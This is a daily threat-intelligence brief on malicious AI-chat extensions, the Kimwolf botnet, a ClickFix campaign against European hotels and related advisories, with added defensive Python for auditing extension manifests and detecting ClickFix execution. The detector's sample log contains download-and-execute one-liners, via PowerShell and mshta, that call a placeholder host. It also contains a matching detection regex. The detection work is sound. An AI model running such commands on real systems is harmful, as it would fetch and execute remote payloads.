
ZeroFox Daily Intelligence Brief - January 7, 2026

by Alpha Team


ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.

Brief Highlights

  • Extensions Exfiltrating Chat Conversations from More than 900,000 Users
  • Kimwolf Botnet Increasingly Scanning for Vulnerable Devices
  • European Hospitality Sector Being Targeted by Russia-Linked ClickFix Campaign

Extensions Exfiltrating Chat Conversations from More than 900,000 Users

Source: https://thehackernews.com/2026/01/two-chrome-extensions-caught-stealing.html

What we know: Two malicious extensions, which together have over 900,000 users, have reportedly been exfiltrating ChatGPT and DeepSeek conversations and browsing data. Stolen data is periodically sent to attacker-controlled servers, exposing sensitive personal and corporate information.

Context: The malicious extensions, called “Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI” and “AI Sidebar with DeepSeek, ChatGPT, Claude, and more,” remained available on a popular web store at the time of writing. The extensions impersonate legitimate tools and abuse certain user-granted permissions to harvest AI chats and browser activity.

Analyst note: Installing these extensions is likely to result in data exfiltration, corporate espionage, credential exposure, and targeted phishing campaigns, particularly if users have shared sensitive personal or business information.
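The item above turns on which permissions an extension is granted. The following is an added example, not code from ZeroFox or from the article, showing how a defender can audit an extension's manifest.json for the permission combinations that make chat harvesting possible: broad host access, a content script that runs on AI chat pages, and tabs/history access for browsing data. The sample manifest is constructed and is not the manifest of either extension named above; the list of AI chat hostnames is an assumption used for illustration.

```python
"""Audit a Chrome extension manifest (Manifest V3) for permission combinations
that let an extension read and exfiltrate page content such as AI chat
conversations. Added example; the sample manifest is constructed."""
import json
from typing import Any

# Host-permission patterns that grant access to every site the user visits.
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# API permissions that, combined with broad host access, enable harvesting of
# page content, browsing activity, or session material.
SENSITIVE_API_PERMISSIONS = {
    "tabs": "can read URL and title of every open tab (browsing activity)",
    "webRequest": "can observe every HTTP request the browser makes",
    "cookies": "can read session cookies for any permitted host",
    "history": "can read the full browsing history",
    "scripting": "can inject scripts into permitted pages at runtime",
    "clipboardRead": "can read whatever the user copies",
}

# AI chat hosts (assumed list for illustration); a content script matching
# these can read conversations straight out of the page DOM.
AI_CHAT_HOSTS = ("chatgpt.com", "chat.openai.com", "chat.deepseek.com", "claude.ai")


def _is_broad(pattern: str) -> bool:
    return pattern in BROAD_HOST_PATTERNS


def _matches_ai_host(pattern: str) -> bool:
    return any(host in pattern for host in AI_CHAT_HOSTS)


def audit_manifest(manifest: dict[str, Any]) -> list[str]:
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings: list[str] = []
    # MV3 keeps host patterns in host_permissions; MV2 mixes them into permissions.
    host_perms = list(manifest.get("host_permissions", [])) + [
        p for p in manifest.get("permissions", []) if "://" in p or p == "<all_urls>"
    ]
    api_perms = [p for p in manifest.get("permissions", []) if p not in host_perms]

    broad = [p for p in host_perms if _is_broad(p)]
    if broad:
        findings.append(f"broad host access: {', '.join(broad)}")

    for perm in api_perms:
        if perm in SENSITIVE_API_PERMISSIONS:
            findings.append(f"permission '{perm}': {SENSITIVE_API_PERMISSIONS[perm]}")

    for cs in manifest.get("content_scripts", []):
        for match in cs.get("matches", []):
            if _is_broad(match):
                findings.append(f"content script runs on every page: {match}")
            elif _matches_ai_host(match):
                findings.append(f"content script can read AI chat pages: {match}")

    # The combination that matters for this brief: a script that can read chat
    # content (any content script can send it out with fetch) plus tabs or
    # history access for browsing activity. Call it out explicitly.
    reads_chat = any("AI chat" in f or "every page" in f for f in findings)
    reads_activity = any(
        f.startswith("permission 'tabs'") or f.startswith("permission 'history'")
        for f in findings
    )
    if reads_chat and reads_activity:
        findings.append("COMBINATION: can read chat content AND browsing activity")
    return findings


# Constructed sample manifest imitating an "AI sidebar" style extension.
SAMPLE_MANIFEST = json.loads("""
{
  "manifest_version": 3,
  "name": "Example AI Sidebar (constructed sample)",
  "permissions": ["tabs", "storage", "history", "scripting"],
  "host_permissions": ["<all_urls>"],
  "content_scripts": [
    {"matches": ["https://chatgpt.com/*", "https://chat.deepseek.com/*"],
     "js": ["sidebar.js"]}
  ]
}
""")

if __name__ == "__main__":
    for finding in audit_manifest(SAMPLE_MANIFEST):
        print(finding)
```

Run it against the unpacked extension directory's manifest.json (or the manifest a browser-management tool exports) to decide whether an extension's declared access is proportionate to what it claims to do; a sidebar tool that only needs one chat site has no business declaring `<all_urls>` together with `tabs` and `history`.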

Kimwolf Botnet Increasingly Scanning for Vulnerable Devices

Source: https://www.bleepingcomputer.com/news/security/kimwolf-android-botnet-abuses-residential-proxies-to-infect-internal-devices/

What we know: The Kimwolf botnet has reportedly compromised over 2 million Android devices and has increased its scanning for vulnerable devices in the past month. The botnet has mostly targeted residential proxy networks with exposed Android Debug Bridge (ADB) services.

Context: The majority of the infected devices are reportedly located in Brazil, Saudi Arabia, India, and Vietnam. Common targets include Android-based TV boxes and streaming devices that expose unauthenticated access over ADB.

Analyst note: Generic and uncertified Android TV boxes are likely at higher risk of being compromised by botnets. Users of compromised devices are likely at risk of account takeover attempts. Furthermore, botnets such as Kimwolf are likely to be used in distributed denial of service (DDoS) attacks, ad fraud, and other cybercriminal activities.

European Hospitality Sector Being Targeted by Russia-Linked ClickFix Campaign

Source: https://www.theregister.com/2026/01/06/russia_hackers_hotel_bsods/

What we know: Russia-linked threat actors are reportedly carrying out a ClickFix attack campaign targeting European hotels and other hospitality entities to deliver a remote access trojan.

Context: The campaign begins with a phishing email appearing to be from Booking[.]com warning of unknown charges in euros. The email takes the victim to a fake verification screen, which is followed by a Windows Blue Screen of Death (BSOD) display that tricks the victim into executing malicious code under the guise of fixing the issue.

Analyst note: The campaign likely intends to collect traveler data that can be leveraged in travel-related scams or for phishing and social engineering attacks.
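The detection opportunity in the chain above is the last step, where the victim runs the attacker-supplied command themselves. The following is an added example, not code from ZeroFox or from the article, of detection logic over process-creation events. It assumes the usual ClickFix mechanic (the command is pasted into the Windows Run box, so the interpreter's parent is explorer.exe), which this brief does not state; the log lines are constructed, and the pipe-separated field layout (timestamp|user|image|parent image|command line) is an assumed export format, not any vendor's schema.

```python
"""Detection logic for the ClickFix execution step: an interpreter spawned by
explorer.exe with a command line that fetches or decodes a payload rather than
one a user would type. Added example; log lines below are constructed."""
import re
from dataclasses import dataclass

# Interpreters and download tools commonly launched from the Run dialog. Tune
# this list to what is normal in your environment.
USER_LAUNCHED_INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "curl.exe", "certutil.exe",
}

# Command-line traits rarely typed by hand but typical of pasted one-liners:
# a remote URL, an encoded command, a hidden window, a policy bypass, or
# download-and-evaluate helpers.
SUSPICIOUS_ARGS = re.compile(
    r"https?://|-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden|"
    r"-nop\b|bypass|iex\b|invoke-expression|downloadstring|frombase64string",
    re.IGNORECASE,
)


@dataclass
class ProcessEvent:
    timestamp: str
    user: str
    image: str
    parent_image: str
    command_line: str


def parse_line(line: str) -> ProcessEvent:
    """Parse one pipe-separated record (assumed export format, see lead-in)."""
    ts, user, image, parent, cmd = line.split("|", 4)
    return ProcessEvent(ts, user, image, parent, cmd)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_clickfix_like(ev: ProcessEvent) -> bool:
    """True when the shell itself spawns an interpreter with a pasted-looking
    command line. Parent explorer.exe is the assumed Run-dialog signal."""
    return (
        _basename(ev.parent_image) == "explorer.exe"
        and _basename(ev.image) in USER_LAUNCHED_INTERPRETERS
        and SUSPICIOUS_ARGS.search(ev.command_line) is not None
    )


def detect(lines: list[str]) -> list[ProcessEvent]:
    return [ev for ev in map(parse_line, lines) if is_clickfix_like(ev)]


# Constructed sample log; hostnames, users and the payload URL are placeholders.
SAMPLE_LOG = [
    # Benign: user opens PowerShell from the Start menu, no arguments.
    "2026-01-07T09:12:01Z|HOTEL\\frontdesk|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|C:\\Windows\\explorer.exe|powershell.exe",
    # Benign: admin script run by a scheduled task; parent is not the shell.
    "2026-01-07T09:15:44Z|NT AUTHORITY\\SYSTEM|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|C:\\Windows\\System32\\svchost.exe|powershell.exe -File C:\\ops\\backup.ps1",
    # Suspicious: pasted one-liner from a fake 'fix' page, hidden window, remote payload.
    "2026-01-07T09:20:30Z|HOTEL\\frontdesk|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|C:\\Windows\\explorer.exe|powershell.exe -w hidden -c iex (iwr 'http://payload.example/fix.txt')",
    # Suspicious: mshta pulling a remote script, also spawned by explorer.
    "2026-01-07T09:21:02Z|HOTEL\\frontdesk|C:\\Windows\\System32\\mshta.exe|C:\\Windows\\explorer.exe|mshta http://payload.example/verify.hta",
]

if __name__ == "__main__":
    for ev in detect(SAMPLE_LOG):
        print(f"{ev.timestamp} {ev.user}: {ev.command_line}")
```

The parent-process condition is what keeps the false-positive rate manageable: administrators launch PowerShell with URLs and encoded arguments all day, but almost never from explorer.exe with a hidden window. On front-desk and back-office hosts where no one should be running interpreters at all, the parent check can be dropped and any match treated as an alert.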

DEEP AND DARK WEB INTELLIGENCE

Ledger data breach: Physical crypto wallet maker Ledger has confirmed a data breach originating from e-commerce partner Global-e, resulting in customer data being stolen and phishing attempts being reported. Stolen data includes names, contact details, and order history. Ledger has confirmed that no passwords, crypto recovery phrases, or payment details were leaked. Threat actors are likely to sell the stolen data to other cybercriminals, leading to an increase in phishing attacks.

VULNERABILITY AND EXPLOIT INTELLIGENCE

CISA warns of multiple MicroServer bugs: Multiple vulnerabilities in Columbia Weather Systems MicroServer firmware, included in CISA's Industrial Control Systems (ICS) advisory, can enable attackers to redirect secure shell (SSH) connections, steal plaintext secrets, and gain admin access. If exploited, these vulnerabilities are likely to enable attackers to hijack trusted communications, maintain persistent unauthorized access, manipulate or delete critical weather data, and disrupt operational technology environments relying on MicroServer systems.

Affected products: The affected products are included in CISA’s ICS advisory.

Tags: DIB, TLP:GREEN